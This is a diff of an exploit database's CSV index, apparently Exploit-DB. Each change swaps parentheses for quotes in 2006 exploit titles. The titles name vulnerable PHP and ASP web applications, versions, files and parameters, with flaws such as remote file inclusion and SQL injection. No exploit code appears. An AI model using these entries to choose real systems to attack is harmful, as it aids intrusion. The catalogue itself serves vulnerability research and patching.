-2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,80 +2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - 'session.php' Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,80 2175,platforms/php/webapps/2175.txt,"WEBInsta CMS 0.3.1 - (templates_dir) Remote File Inclusion",2006-08-12,K-159,php,webapps,0 2177,platforms/php/webapps/2177.txt,"Joomla! Component Webring 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",php,webapps,0 2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final - basename() Remote Command Execution",2006-08-13,rgod,php,webapps,0 -2181,platforms/php/webapps/2181.pl,"PHPay 2.02 - (nu_mail.inc.php) Remote mail() Injection",2006-08-14,beford,php,webapps,80 +2181,platforms/php/webapps/2181.pl,"PHPay 2.02 - 'nu_mail.inc.php' Remote mail() Injection",2006-08-14,beford,php,webapps,80 2182,platforms/php/webapps/2182.txt,"Mambo Component MMP 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0 2183,platforms/php/webapps/2183.txt,"ProjectButler 0.8.4 - (rootdir) Remote File Inclusion",2006-08-14,"the master",php,webapps,0 2184,platforms/php/webapps/2184.txt,"Mambo Component Peoplebook 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0 2186,platforms/asp/webapps/2186.txt,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)",2006-08-14,ASIANEAGLE,asp,webapps,0 2187,platforms/php/webapps/2187.htm,"WEBInsta MM 1.3e - 'absolute_path' Remote File Inclusion",2006-08-15,str0ke,php,webapps,0 2188,platforms/php/webapps/2188.txt,"Discloser 0.0.4 - (fileloc) Remote File Inclusion",2006-08-15,"Arash RJ",php,webapps,0 -2189,platforms/php/webapps/2189.txt,"WEBInsta CMS 0.3.1 - (users.php) Remote File Inclusion",2006-08-15,Yns,php,webapps,0 +2189,platforms/php/webapps/2189.txt,"WEBInsta CMS 0.3.1 - 'users.php' Remote File Inclusion",2006-08-15,Yns,php,webapps,0 2190,platforms/php/webapps/2190.txt,"PHProjekt 5.1 - Multiple Remote File Inclusion",2006-08-15,Kacper,php,webapps,0 2191,platforms/php/webapps/2191.txt,"dotProject 2.0.4 - 'baseDir' Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 2192,platforms/php/webapps/2192.txt,"OPT Max 1.2.0 - (CRM_inc) Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 2196,platforms/php/webapps/2196.txt,"Mambo Component CopperminePhotoGalery - Remote File Inclusion",2006-08-16,k1tk4t,php,webapps,0 2198,platforms/php/webapps/2198.php,"CubeCart 3.0.11 - (oid) Blind SQL Injection",2006-08-17,rgod,php,webapps,0 2199,platforms/php/webapps/2199.txt,"IRSR 0.2 - (_sysSessionPath) Remote File Inclusion",2006-08-17,Kacper,php,webapps,0 -2200,platforms/php/webapps/2200.txt,"WTcom 0.2.4-alpha - (torrents.php) SQL Injection",2006-08-17,sh1r081,php,webapps,0 +2200,platforms/php/webapps/2200.txt,"WTcom 0.2.4-alpha - 'torrents.php' SQL Injection",2006-08-17,sh1r081,php,webapps,0 2201,platforms/php/webapps/2201.txt,"POWERGAP 2003 - 's0x.php' Remote File Inclusion",2006-08-17,"Saudi Hackrz",php,webapps,0 2202,platforms/php/webapps/2202.txt,"Mambo Component mambelfish 1.1 - Remote File Inclusion",2006-08-17,mdx,php,webapps,0 2203,platforms/php/webapps/2203.txt,"Joomla! Component com_jim 1.0.1 - Remote File Inclusion",2006-08-17,"Mehmet Ince",php,webapps,0 @@ -16527,7 +16530,7 @@ id,file,description,date,author,platform,type,port 2206,platforms/php/webapps/2206.txt,"Mambo Component 'com_phpshop' 1.2 RC2b - File Inclusion",2006-08-17,Cmaster4,php,webapps,0 2207,platforms/php/webapps/2207.txt,"Mambo Component 'com_a6mambocredits' 1.0.0 - File Inclusion",2006-08-17,Cmaster4,php,webapps,0 2209,platforms/php/webapps/2209.txt,"Joomla! Component Artlinks 1.0b4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 -2211,platforms/php/webapps/2211.txt,"PHlyMail Lite 3.4.4 - (mod.listmail.php) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 +2211,platforms/php/webapps/2211.txt,"PHlyMail Lite 3.4.4 - 'mod.listmail.php' Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 2212,platforms/php/webapps/2212.txt,"phpCodeGenie 3.0.2 - (BEAUT_PATH) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 2213,platforms/php/webapps/2213.txt,"Mambo Component MamboWiki 0.9.6 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2214,platforms/php/webapps/2214.txt,"Joomla! Component Link Directory 1.0.3 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 @@ -16545,22 +16548,22 @@ id,file,description,date,author,platform,type,port 2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0 2229,platforms/php/webapps/2229.txt,"Shadows Rising RPG 0.0.5b - Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 -2230,platforms/asp/webapps/2230.txt,"LBlog 1.05 - (comments.asp) SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 +2230,platforms/asp/webapps/2230.txt,"LBlog 1.05 - 'comments.asp' SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 2231,platforms/php/webapps/2231.php,"Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Remote Exploit",2006-08-20,rgod,php,webapps,0 2232,platforms/php/webapps/2232.pl,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)",2006-08-20,ASIANEAGLE,php,webapps,0 2235,platforms/php/webapps/2235.txt,"PHProjekt 6.1 - (path_pre) Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 -2236,platforms/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - (folderprops.php) Remote File Inclusion (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 -2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - (checklevel.php) Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0 +2236,platforms/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - 'folderprops.php' Remote File Inclusion (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 +2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - 'checklevel.php' Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0 2240,platforms/php/webapps/2240.txt,"HPE 1.0 - (HPEinc) Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0 2243,platforms/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - 'User-Agent' SQL Injection",2006-08-23,rgod,php,webapps,0 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - (start) SQL Injection",2006-08-23,SpiderZ,php,webapps,0 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0 2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 -2251,platforms/php/webapps/2251.pl,"VistaBB 2.x - (functions_mod_user.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 +2251,platforms/php/webapps/2251.pl,"VistaBB 2.x - 'functions_mod_user.php' Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,php,webapps,0 2253,platforms/php/webapps/2253.php,"Phaos 0.9.2 - basename() Remote Command Execution",2006-08-24,Kacper,php,webapps,0 -2254,platforms/php/webapps/2254.txt,"PHPCOIN 1.2.3 - (session_set.php) Remote File Inclusion",2006-08-24,Timq,php,webapps,0 +2254,platforms/php/webapps/2254.txt,"PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion",2006-08-24,Timq,php,webapps,0 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0 2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Parameter Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 @@ -16589,7 +16592,7 @@ id,file,description,date,author,platform,type,port 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0 -2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - (aedating4CMS.php) Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0 +2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0 2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 2296,platforms/asp/webapps/2296.txt,"SimpleBlog 2.3 - 'id' SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0 @@ -16608,7 +16611,7 @@ id,file,description,date,author,platform,type,port 2311,platforms/php/webapps/2311.txt,"phpBB Shadow Premod 2.7.1 - Remote File Inclusion",2006-09-06,Kw3[R]Ln,php,webapps,0 2312,platforms/php/webapps/2312.txt,"BinGo News 3.01 - (bnrep) Remote File Inclusion",2006-09-06,SHiKaA,php,webapps,0 2313,platforms/php/webapps/2313.txt,"phpFullAnnu 5.1 - (repmod) Remote File Inclusion",2006-09-06,SHiKaA,php,webapps,0 -2314,platforms/php/webapps/2314.txt,"Beautifier 0.1 - (Core.php) Remote File Inclusion",2006-09-06,"the master",php,webapps,0 +2314,platforms/php/webapps/2314.txt,"Beautifier 0.1 - 'Core.php' Remote File Inclusion",2006-09-06,"the master",php,webapps,0 2315,platforms/php/webapps/2315.txt,"Akarru 0.4.3.34 - (bm_content) Remote File Inclusion",2006-09-06,ddoshomo,php,webapps,0 2316,platforms/php/webapps/2316.txt,"PayProCart 1146078425 - Multiple Remote File Inclusion",2006-09-07,momo26,php,webapps,0 2317,platforms/php/webapps/2317.txt,"SL_Site 1.0 - (spaw_root) Remote File Inclusion",2006-09-07,Kw3[R]Ln,php,webapps,0 @@ -16667,11 +16670,11 @@ id,file,description,date,author,platform,type,port 2381,platforms/php/webapps/2381.txt,"guanxiCRM Business Solution 0.9.1 - Remote File Inclusion",2006-09-16,SHiKaA,php,webapps,0 2382,platforms/php/webapps/2382.pl,"Zix Forum 1.12 - 'RepId' SQL Injection (2)",2006-09-17,SlimTim10,php,webapps,0 2383,platforms/php/webapps/2383.txt,"MobilePublisherPHP 1.5 RC2 - Remote File Inclusion",2006-09-17,Timq,php,webapps,0 -2384,platforms/asp/webapps/2384.txt,"Q-Shop 3.5 - (browse.asp) SQL Injection",2006-09-17,ajann,asp,webapps,0 +2384,platforms/asp/webapps/2384.txt,"Q-Shop 3.5 - 'browse.asp' SQL Injection",2006-09-17,ajann,asp,webapps,0 2385,platforms/asp/webapps/2385.txt,"Techno Dreams FAQ Manager 1.0 - SQL Injection",2006-09-17,ajann,asp,webapps,0 2386,platforms/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 - SQL Injection",2006-09-17,ajann,asp,webapps,0 -2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) SQL Injection",2006-09-17,ajann,asp,webapps,0 -2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - (users_logins/admin.txt) Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 +2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - 'Review.asp' SQL Injection",2006-09-17,ajann,asp,webapps,0 +2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - 'users_logins/admin.txt' Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps,0 2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0 2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution",2006-09-19,rgod,php,webapps,0 @@ -16687,100 +16690,100 @@ id,file,description,date,author,platform,type,port 2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Parameter Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0 2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0 2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0 -2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - (dix.php3) Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0 +2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - 'dix.php3' Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion",2006-09-21,Solpot,php,webapps,0 -2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - (RR.php) Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 +2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - 'RR.php' Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 2413,platforms/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 2414,platforms/php/webapps/2414.txt,"Wili-CMS 0.1.1 - File Inclusion / Cross-Site Scripting / Full Path Disclosure",2006-09-21,"HACKERS PAL",php,webapps,0 2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution",2006-09-22,rgod,php,webapps,0 -2416,platforms/asp/webapps/2416.txt,"xweblog 2.1 - (kategori.asp) SQL Injection",2006-09-22,Muhacir,asp,webapps,0 +2416,platforms/asp/webapps/2416.txt,"xweblog 2.1 - 'kategori.asp' SQL Injection",2006-09-22,Muhacir,asp,webapps,0 2417,platforms/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 - 'index.php' SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0 2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 - 'all_users.php' SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0 -2419,platforms/php/webapps/2419.txt,"Web-News 1.6.3 - (template.php) Remote File Inclusion",2006-09-24,Drago84,php,webapps,0 +2419,platforms/php/webapps/2419.txt,"Web-News 1.6.3 - 'template.php' Remote File Inclusion",2006-09-24,Drago84,php,webapps,0 2420,platforms/php/webapps/2420.txt,"ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion",2006-09-24,Drago84,php,webapps,0 2421,platforms/asp/webapps/2421.pl,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)",2006-09-24,gega,asp,webapps,0 -2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script 3.4 - (mcf.php) Remote File Inclusion",2006-09-24,xdh,php,webapps,0 +2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script 3.4 - 'mcf.php' Remote File Inclusion",2006-09-24,xdh,php,webapps,0 2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 -2424,platforms/php/webapps/2424.txt,"SyntaxCMS 1.3 - (0004_init_urls.php) Remote File Inclusion",2006-09-24,MoHaJaLi,php,webapps,0 -2427,platforms/php/webapps/2427.txt,"Polaring 0.04.03 - (general.php) Remote File Inclusion",2006-09-25,Drago84,php,webapps,0 +2424,platforms/php/webapps/2424.txt,"SyntaxCMS 1.3 - '0004_init_urls.php' Remote File Inclusion",2006-09-24,MoHaJaLi,php,webapps,0 +2427,platforms/php/webapps/2427.txt,"Polaring 0.04.03 - 'general.php' Remote File Inclusion",2006-09-25,Drago84,php,webapps,0 2428,platforms/php/webapps/2428.txt,"PBLang 4.66z - (temppath) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2429,platforms/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - 'phpbb_root_path' File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2431,platforms/php/webapps/2431.txt,"evoBB 0.3 - (path) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 -2432,platforms/php/webapps/2432.txt,"BrudaNews 1.1 - (admin/index.php) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 -2433,platforms/php/webapps/2433.txt,"BrudaGB 1.1 - (admin/index.php) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 -2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - (fs_form_links.php) File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2432,platforms/php/webapps/2432.txt,"BrudaNews 1.1 - 'admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2433,platforms/php/webapps/2433.txt,"BrudaGB 1.1 - 'admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - 'fs_form_links.php' File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2435,platforms/php/webapps/2435.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (1)",2006-09-26,ThE-WoLf-KsA,php,webapps,0 2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - 'menu.php' Remote File Inclusion",2006-09-26,Drago84,php,webapps,0 2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - 'class.mysql.php' Remote File Inclusion",2006-09-26,Kacper,php,webapps,0 -2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0 -2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 +2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - 'hit.php' Remote File Inclusion",2006-09-26,D_7J,php,webapps,0 +2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusion",2006-09-27,v1per-haCker,php,webapps,0 -2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Inclusion",2006-09-27,"Mehmet Ince",php,webapps,0 -2446,platforms/php/webapps/2446.php,"PPA Gallery 1.0 - (functions.inc.php) Remote File Inclusion",2006-09-28,Kacper,php,webapps,0 +2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - 'main.inc.php' Remote File Inclusion",2006-09-27,"Mehmet Ince",php,webapps,0 +2446,platforms/php/webapps/2446.php,"PPA Gallery 1.0 - 'functions.inc.php' Remote File Inclusion",2006-09-28,Kacper,php,webapps,0 2447,platforms/php/webapps/2447.php,"KGB 1.87 - (Local Inclusion) Remote Code Execution",2006-09-28,Kacper,php,webapps,0 2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) 2.0 - 'config.inc.php' File Inclusion",2006-09-28,D_7J,php,webapps,0 2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard 2.1.b b2 - 'index.php' Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 -2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 - (window.php) Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 -2452,platforms/php/webapps/2452.txt,"PHPSecurePages 0.28b - (secure.php) Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 +2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 - 'window.php' Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 +2452,platforms/php/webapps/2452.txt,"PHPSecurePages 0.28b - 'secure.php' Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 2453,platforms/php/webapps/2453.txt,"phpBB XS 0.58a - 'phpbb_root_path' Remote File Inclusion",2006-09-28,"Mehmet Ince",php,webapps,0 2454,platforms/php/webapps/2454.txt,"PowerPortal 1.3a - 'index.php' Remote File Inclusion",2006-09-29,v1per-haCker,php,webapps,0 2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - 'pdf.php' Remote File Inclusion",2006-09-29,Kacper,php,webapps,0 -2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - (display.php) SQL Injection",2006-09-29,Trex,php,webapps,0 -2457,platforms/php/webapps/2457.php,"UBB.Threads 6.5.1.1 - (doeditconfig.php) Code Execution",2006-09-29,"HACKERS PAL",php,webapps,0 +2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - 'display.php' SQL Injection",2006-09-29,Trex,php,webapps,0 +2457,platforms/php/webapps/2457.php,"UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution",2006-09-29,"HACKERS PAL",php,webapps,0 2459,platforms/php/webapps/2459.txt,"Forum82 <= 2.5.2b - (repertorylevel) Multiple File Inclusion",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 -2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - (yesno.phtml) Remote File Inclusion",2006-09-30,Drago84,php,webapps,0 +2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - 'yesno.phtml' Remote File Inclusion",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion",2006-10-01,Kacper,php,webapps,0 -2468,platforms/php/webapps/2468.txt,"BBaCE 3.5 - (includes/functions.php) Remote File Inclusion",2006-10-02,SpiderZ,php,webapps,0 +2468,platforms/php/webapps/2468.txt,"BBaCE 3.5 - 'includes/functions.php' Remote File Inclusion",2006-10-02,SpiderZ,php,webapps,0 2469,platforms/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - 'forum.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0 2470,platforms/php/webapps/2470.txt,"phpMyProfiler 0.9.6 - Remote File Inclusion",2006-10-03,mozi,php,webapps,0 2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0 -2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - (show_hlp.php) File Inclusion",2006-10-03,Kacper,php,webapps,0 +2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - 'show_hlp.php' File Inclusion",2006-10-03,Kacper,php,webapps,0 2473,platforms/php/webapps/2473.c,"Invision Gallery 2.0.7 - readfile() & SQL Injection",2006-10-03,1nf3ct0r,php,webapps,0 2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusion",2006-10-04,"ThE TiGeR",php,webapps,0 2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - File Inclusion",2006-10-04,SpiderZ,php,webapps,0 -2476,platforms/php/webapps/2476.txt,"PHPGreetz 0.99 - (footer.php) Remote File Inclusion",2006-10-04,mozi,php,webapps,0 +2476,platforms/php/webapps/2476.txt,"PHPGreetz 0.99 - 'footer.php' Remote File Inclusion",2006-10-04,mozi,php,webapps,0 2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - phpbb_root_path File Inclusion",2006-10-04,Kw3[R]Ln,php,webapps,0 2478,platforms/php/webapps/2478.txt,"phpMyTeam 2.0 - (smileys_dir) Remote File Inclusion",2006-10-05,"Mehmet Ince",php,webapps,0 2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 - 'index.php' SQL Injection",2006-10-05,Kzar,php,webapps,0 -2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Inclusion",2006-10-05,SpiderZ,php,webapps,0 +2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion",2006-10-05,SpiderZ,php,webapps,0 2481,platforms/php/webapps/2481.txt,"Dimension of phpBB 0.2.6 - 'phpbb_root_path' Remote File Inclusions",2006-10-05,SpiderZ,php,webapps,0 2483,platforms/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker 1.0 - File Inclusion",2006-10-06,"Mehmet Ince",php,webapps,0 2484,platforms/php/webapps/2484.txt,"FreeForum 0.9.7 - 'forum.php' Remote File Inclusion",2006-10-07,"Mehmet Ince",php,webapps,0 -2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 - (lire.php) SQL Injection",2006-10-07,s4mi,php,webapps,0 +2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 - 'lire.php' SQL Injection",2006-10-07,s4mi,php,webapps,0 2486,platforms/php/webapps/2486.txt,"phpBB Random User Registration Number 1.0 Mod - Inclusion",2006-10-07,bd0rk,php,webapps,0 2487,platforms/php/webapps/2487.php,"4Images 1.7.x - 'search.php' SQL Injection",2006-10-08,Synsta,php,webapps,0 2488,platforms/php/webapps/2488.txt,"PHPMyNews 1.4 - (cfg_include_dir) Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 2489,platforms/php/webapps/2489.pl,"Ciamos CMS 0.9.6b - 'config.php' Remote File Inclusion",2006-10-08,Kacper,php,webapps,0 2490,platforms/php/webapps/2490.txt,"Freenews 1.1 - 'moteur.php' Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 -2491,platforms/php/webapps/2491.pl,"PHPPC 1.03 RC1 - (/lib/functions.inc.php) Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 -2493,platforms/php/webapps/2493.pl,"docmint 2.0 - (engine/require.php) Remote File Inclusion",2006-10-09,K-159,php,webapps,0 +2491,platforms/php/webapps/2491.pl,"PHPPC 1.03 RC1 - '/lib/functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 +2493,platforms/php/webapps/2493.pl,"docmint 2.0 - 'engine/require.php' Remote File Inclusion",2006-10-09,K-159,php,webapps,0 2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 2496,platforms/php/webapps/2496.txt,"WebYep 1.1.9 - (webyep_sIncludePath) File Inclusion",2006-10-09,the_day,php,webapps,0 2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 2498,platforms/php/webapps/2498.php,"Flatnuke 2.5.8 - file() Privilege Escalation / Code Execution",2006-10-10,rgod,php,webapps,0 2499,platforms/php/webapps/2499.php,"Flatnuke 2.5.8 - (userlang) Local Inclusion / Delete All Users Exploit",2006-10-10,rgod,php,webapps,0 -2500,platforms/php/webapps/2500.pl,"phpMyAgenda 3.1 - (templates/header.php3) Local File Inclusion",2006-10-10,"Nima Salehi",php,webapps,0 -2501,platforms/php/webapps/2501.txt,"TribunaLibre 3.12 Beta - (ftag.php) Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 +2500,platforms/php/webapps/2500.pl,"phpMyAgenda 3.1 - 'templates/header.php3' Local File Inclusion",2006-10-10,"Nima Salehi",php,webapps,0 +2501,platforms/php/webapps/2501.txt,"TribunaLibre 3.12 Beta - 'ftag.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 2502,platforms/php/webapps/2502.txt,"registroTL - 'main.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 -2503,platforms/php/webapps/2503.txt,"compteur 2.0 - (param_editor.php) Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 +2503,platforms/php/webapps/2503.txt,"compteur 2.0 - 'param_editor.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 2504,platforms/php/webapps/2504.txt,"eboli - 'index.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 